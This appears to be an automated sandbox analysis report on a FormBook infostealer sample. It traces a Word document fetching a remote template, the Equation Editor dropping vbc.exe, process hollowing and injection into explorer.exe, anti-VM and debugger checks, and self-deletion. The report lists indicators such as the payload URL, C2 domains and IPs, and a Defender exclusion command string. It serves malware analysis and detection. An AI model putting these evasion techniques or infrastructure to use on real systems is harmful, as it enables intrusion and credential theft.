File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: wntdll.pdb source: vbc.exe, NAPSTAT.EXE
Source:	Binary string: napstat.pdb source: vbc.exe, 00000006.00000002.2224936502.0000000000370000.00000040.00000001.sdmp
Source:	Binary string: SByteTypeInfo.pdb source: vbc.exe, vbc.exe.3.dr

Data Obfuscation:

.NET source code contains method to dynamically call methods (often used by packers)

Show sources

Source: vbc[1].exe.3.dr, vJiGl01UUJfXfNWas3/DyyVDbaRvM1YfIq9il.cs	.Net Code: stackVariable5.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 5.0.vbc.exe.1f0000.0.unpack, vJiGl01UUJfXfNWas3/DyyVDbaRvM1YfIq9il.cs	.Net Code: stackVariable5.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 5.2.vbc.exe.1f0000.0.unpack, vJiGl01UUJfXfNWas3/DyyVDbaRvM1YfIq9il.cs	.Net Code: stackVariable5.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 6.0.vbc.exe.1f0000.1.unpack, vJiGl01UUJfXfNWas3/DyyVDbaRvM1YfIq9il.cs	.Net Code: stackVariable5.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 6.0.vbc.exe.1f0000.0.unpack, vJiGl01UUJfXfNWas3/DyyVDbaRvM1YfIq9il.cs	.Net Code: stackVariable5.GetMethod("GetDelegateForFunctionPointer", V_0)

Source: C:\Users\Public\vbc.exe	Code function: 5_2_001F99D1 push esi; ret	5_2_001F99D9
Source: C:\Users\Public\vbc.exe	Code function: 6_2_001F99D1 push esi; ret	6_2_001F99D9
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00417017 push ecx; retf	6_2_00417027
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00416C8E push FFFFFF9Eh; iretd	6_2_00416C9F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0041B533 push ecx; retf	6_2_0041B535
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0041CEB5 push eax; ret	6_2_0041CF08
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0040EF68 push esp; retf 0000h	6_2_0040EF39
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0041CF6C push eax; ret	6_2_0041CF72
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0041CF02 push eax; ret	6_2_0041CF08
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0041CF0B push eax; ret	6_2_0041CF72
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0041DF91 push es; ret	6_2_0041DF92
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00A0DFA1 push ecx; ret	6_2_00A0DFB4
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01F2DFA1 push ecx; ret	8_2_01F2DFB4
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_00097017 push ecx; retf	8_2_00097027
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_0009B533 push ecx; retf	8_2_0009B535
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_00096C8E push FFFFFF9Eh; iretd	8_2_00096C9F
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_0009CEB5 push eax; ret	8_2_0009CF08
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_0009CF0B push eax; ret	8_2_0009CF72
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_0009CF02 push eax; ret	8_2_0009CF08
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_0008EF68 push esp; retf 0000h	8_2_0008EF39
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_0009CF6C push eax; ret	8_2_0009CF72
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_0009DF91 push es; ret	8_2_0009DF92

Source: initial sample

Static PE information: section name: .text entropy: 7.84462837338

Source: vbc[1].exe.3.dr, vJiGl01UUJfXfNWas3/DyyVDbaRvM1YfIq9il.cs	High entropy of concatenated method names: '.cctor', 'UksSQb', 'creoiNvd7', 'jZiU8kt7k', 'yIEeUuogE', 'HNMMnrD0K', 'U6ZIpjiMV', 'TYIaeXNeW', 'rI3lmZ9FL', 'SuhhReBcy'
Source: 5.0.vbc.exe.1f0000.0.unpack, vJiGl01UUJfXfNWas3/DyyVDbaRvM1YfIq9il.cs	High entropy of concatenated method names: '.cctor', 'UksSQb', 'creoiNvd7', 'jZiU8kt7k', 'yIEeUuogE', 'HNMMnrD0K', 'U6ZIpjiMV', 'TYIaeXNeW', 'rI3lmZ9FL', 'SuhhReBcy'
Source: 5.2.vbc.exe.1f0000.0.unpack, vJiGl01UUJfXfNWas3/DyyVDbaRvM1YfIq9il.cs	High entropy of concatenated method names: '.cctor', 'UksSQb', 'creoiNvd7', 'jZiU8kt7k', 'yIEeUuogE', 'HNMMnrD0K', 'U6ZIpjiMV', 'TYIaeXNeW', 'rI3lmZ9FL', 'SuhhReBcy'
Source: 6.0.vbc.exe.1f0000.1.unpack, vJiGl01UUJfXfNWas3/DyyVDbaRvM1YfIq9il.cs	High entropy of concatenated method names: '.cctor', 'UksSQb', 'creoiNvd7', 'jZiU8kt7k', 'yIEeUuogE', 'HNMMnrD0K', 'U6ZIpjiMV', 'TYIaeXNeW', 'rI3lmZ9FL', 'SuhhReBcy'
Source: 6.0.vbc.exe.1f0000.0.unpack, vJiGl01UUJfXfNWas3/DyyVDbaRvM1YfIq9il.cs	High entropy of concatenated method names: '.cctor', 'UksSQb', 'creoiNvd7', 'jZiU8kt7k', 'yIEeUuogE', 'HNMMnrD0K', 'U6ZIpjiMV', 'TYIaeXNeW', 'rI3lmZ9FL', 'SuhhReBcy'

Persistence and Installation Behavior:

Contains an external reference to another document

Show sources

Source: webSettings.xml.rels

Binary or memory string: <Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/frame" Target="http://xy2.eu/e9yj" TargetMode="External"/></Relationships>

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\vbc[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)

Show sources

Source: explorer.exe

User mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x81 0x1E 0xE3

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM3

Show sources

Source: Yara match	File source: 00000005.00000002.2185034993.0000000002256000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2296, type: MEMORY

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: vbc.exe, 00000005.00000002.2185034993.0000000002256000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: vbc.exe, 00000005.00000002.2185034993.0000000002256000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	RDTSC instruction interceptor: First address: 00000000000898E4 second address: 00000000000898EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	RDTSC instruction interceptor: First address: 0000000000089B5E second address: 0000000000089B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\Public\vbc.exe

Code function: 5_2_04312430 rdtsc

5_2_04312430

Source: C:\Users\Public\vbc.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2964	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2952	Thread sleep time: -104524s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2912	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2792	Thread sleep time: -34000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE TID: 2920	Thread sleep time: -55000s >= -30000s	Jump to behavior

Source: C:\Windows\explorer.exe

Last function: Thread delayed

Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 104524			Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: explorer.exe, 00000007.00000000.2194902071.0000000004234000.00000004.00000001.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 00000007.00000000.2212945297.00000000001F5000.00000004.00000020.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000000.2194945747.0000000004263000.00000004.00000001.sdmp	Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
Source: vbc.exe, 00000005.00000002.2185034993.0000000002256000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: vbc.exe, 00000005.00000002.2185034993.0000000002256000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000005.00000002.2185034993.0000000002256000.00000004.00000001.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000007.00000000.2194902071.0000000004234000.00000004.00000001.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: vbc.exe, 00000005.00000002.2185034993.0000000002256000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
Source: vbc.exe, 00000005.00000002.2185034993.0000000002256000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: vbc.exe, 00000005.00000002.2185034993.0000000002256000.00000004.00000001.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000005.00000002.2185034993.0000000002256000.00000004.00000001.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: vbc.exe, 00000005.00000002.2185034993.0000000002256000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: vbc.exe, 00000005.00000002.2185034993.0000000002256000.00000004.00000001.sdmp	Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: explorer.exe, 00000007.00000000.2212996363.0000000000231000.00000004.00000020.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}

Source: C:\Users\Public\vbc.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\Public\vbc.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Process queried: DebugPort			Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 5_2_04312430 rdtsc

5_2_04312430

Source: C:\Users\Public\vbc.exe

Code function: 6_2_0040ACD0 LdrLoadDll,

6_2_0040ACD0

Source: C:\Users\Public\vbc.exe	Code function: 5_2_00BD7CE2 mov eax, dword ptr fs:[00000030h]	5_2_00BD7CE2
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00A126F8 mov eax, dword ptr fs:[00000030h]	6_2_00A126F8
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 8_2_01F326F8 mov eax, dword ptr fs:[00000030h]	8_2_01F326F8

Source: C:\Users\Public\vbc.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\Public\vbc.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Domain query: www.loundxgroup.com
Source: C:\Windows\explorer.exe	Network Connect: 91.227.139.235 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.grandcanyonbean.com
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\Public\vbc.exe

Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\SysWOW64\NAPSTAT.EXE protection: execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\SysWOW64\NAPSTAT.EXE protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\Public\vbc.exe	Thread register set: target process: 1388			Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Thread register set: target process: 1388			Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\Public\vbc.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Users\Public\vbc.exe

Section unmapped: C:\Windows\SysWOW64\NAPSTAT.EXE base address: 920000

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'	Jump to behavior

Source: explorer.exe, 00000007.00000000.2213544762.00000000006F0000.00000002.00000001.sdmp, NAPSTAT.EXE, 00000008.00000002.2443473464.0000000000970000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000007.00000000.2213544762.00000000006F0000.00000002.00000001.sdmp, NAPSTAT.EXE, 00000008.00000002.2443473464.0000000000970000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000007.00000000.2212945297.00000000001F5000.00000004.00000020.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000007.00000000.2213544762.00000000006F0000.00000002.00000001.sdmp, NAPSTAT.EXE, 00000008.00000002.2443473464.0000000000970000.00000002.00000001.sdmp	Binary or memory string: !Progman

Source: C:\Users\Public\vbc.exe

Queries volume information: C:\Users\Public\vbc.exe VolumeInformation

Jump to behavior

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000008.00000002.2443394630.00000000003C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.2215103438.000000000293F000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2443316419.0000000000230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2185257430.0000000003239000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2442286951.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2224718389.00000000000F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.2183018548.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2224969781.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2224913904.00000000002F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2185374644.000000000333A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 6.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
